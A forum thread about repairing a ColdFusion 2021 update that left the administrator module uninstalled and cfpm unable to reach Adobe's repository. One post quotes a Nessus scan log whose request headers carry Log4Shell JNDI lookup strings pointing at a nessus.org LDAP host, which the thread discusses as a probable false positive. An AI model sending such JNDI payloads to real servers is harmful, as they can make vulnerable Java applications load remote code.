After updating Coldfusion 2021 to update 6, I'm greeted by "The administrator module is not installed." It recommends to use cfpm to "install administrator". This doesn't work and just returns null twice. The website still loads luckily. Any idea what broke or how to fix it. The install log shows 1551 Successes and 0 issues. Thanks.

Hi Mike,

Thank you Sandip! Got me back up and running. My fault not updating neo_updates.xml properly

Mike, I trust that you got things resolved with Sandip's kind offer of direct help. To your earlier comment, the post you refer to does not offer cfinstall@adobe.com (two L's) but cfinstal@adobe.com (one L). It is unfortunate that they've never setup the latter as an alias to the former. As for your cfpm issues, that has to be some local issue. To be clear, cfpm works--and I've never seen the behavior you observe (in helping many use it). Did you guys sort that out? More important, did you sort out the inability to get the admin module installed? Using CFPM is the key in that situation. And barring that, there are lower-level ways to resolve it. Again, I trust that Sandip would have walked you through that. If not, I'm available also to help remotely with such challenges (carehart.org/consulting).

Yes, we figured it out. Thanks. The weird thing with updates is my server is online, but I still have to install it as if it wasn't. I can load https://www.adobe.com/go/coldfusion-updates in my browser, and via curl in the command line. But cfpm can't load it. So I just download the zip file and point neo_updates.xml to it. I'm not sure if this is related to update 6, but the other weird thing that our University security office sent over a day after I did the update was this log4shell vulnerability. Not really much detail. Starting to look into this. I know I can update the underlying Java that Coldfusion relies on. Was going to do that either way. Not sure that will help this. ----- Nessus was able to detect vulnerability by sending the following request GET /cgi-bin/cart.cgi HTTP/1.1 Host: [the host name of the server] Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 Accept-Language: ${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.or g/nessus} Connection: Keep-Alive Referer: ${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.or g/nessus} X-Api-Version: ${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.or g/nessus} Cookie: ${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.or g/nessus}=${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w .nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-generic-xbse8vLF7cpNU 4d1oYnB${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-g eneric-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jnd i:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.org/nes sus};token=${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}. w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d 1oYnB${lower:ten}.w.nessus.org/nessus} User-Agent: ${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.or g/nessus} Pragma: no-cache If-Modified-Since: ${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.or g/nessus} Accept: ${jndi:ldap://log4shell-generic-xbse8vLF7cpNU4d1oYnB${lower:ten}.w.nessus.or g/nessus} Nessus detected that the target host performed a DNS lookup on a LDAP host.

Glad you solved it. On your cfpm issue, it may be that the jvm it finds does not work well with calling out to the Adobe site. It defaults to using the one pointed to by your OS's JAVA_HOME env var. What is yours? On windows, just issue

set JAVA_HOME

at the command line. When that's run without assigning it a value, it shows the current value. On your log4j report, that's showing they made a request to cgi-bin/cart.cgi, which does not involve cf.

Very good point regarding the log4j report! we don't even have a cgi-bin folder. I wonder if it's a false positive somehow. On the server there was no other java installed. Java_home isn't assigned. Just to try I setup java_home to point to the latest version of 11 (11.0.18) that Coldfusion is going, and then also setup the path to point to the %java_home%\bin folder. Restarted the command prompt (as administrator) and Coldfusion. Still same thing. "The packages repository https://cfdownload.adobe.com/pub/adobe/coldfusion/xml/updates.xml is not accessible. You can only load the packages that are available locally in the C:\ColdFusion2021\bundles directory. It's fine though. As long as I know how to do it manually I'm set. Better than nothing. Thanks!